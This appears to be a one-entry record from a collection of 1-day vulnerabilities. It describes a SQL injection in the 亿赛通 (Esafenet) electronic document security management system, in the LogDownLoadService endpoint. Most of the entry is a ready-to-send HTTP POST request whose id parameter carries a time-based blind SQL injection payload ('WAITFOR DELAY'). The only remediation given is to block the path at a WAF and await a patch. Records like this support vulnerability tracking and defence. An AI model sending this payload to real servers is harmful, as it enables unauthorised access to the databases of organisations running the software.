vendor = "亿赛通"
name = "亿赛通电子文档安全管理系统 LogDownLoadService sql注入漏洞"
type = "SQL注入"
version = "未知"
path = "/CDGServer3/logManagement/LogDownLoadService"
detail = "POST /CDGServer3/logManagement/LogDownLoadService HTTP/1.1 Host: User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36 Content-Type: application/x-www-form-urlencoded command=downLoadLogFiles&currPage=1&fromurl=../user/dataSearch.jsp&logFileName=indsex.txt&id=-1';WAITFOR DELAY '0:0:6'--"
fix = "WAF封禁路路径，等待发布补丁"
date = "0816"
label = "1day"
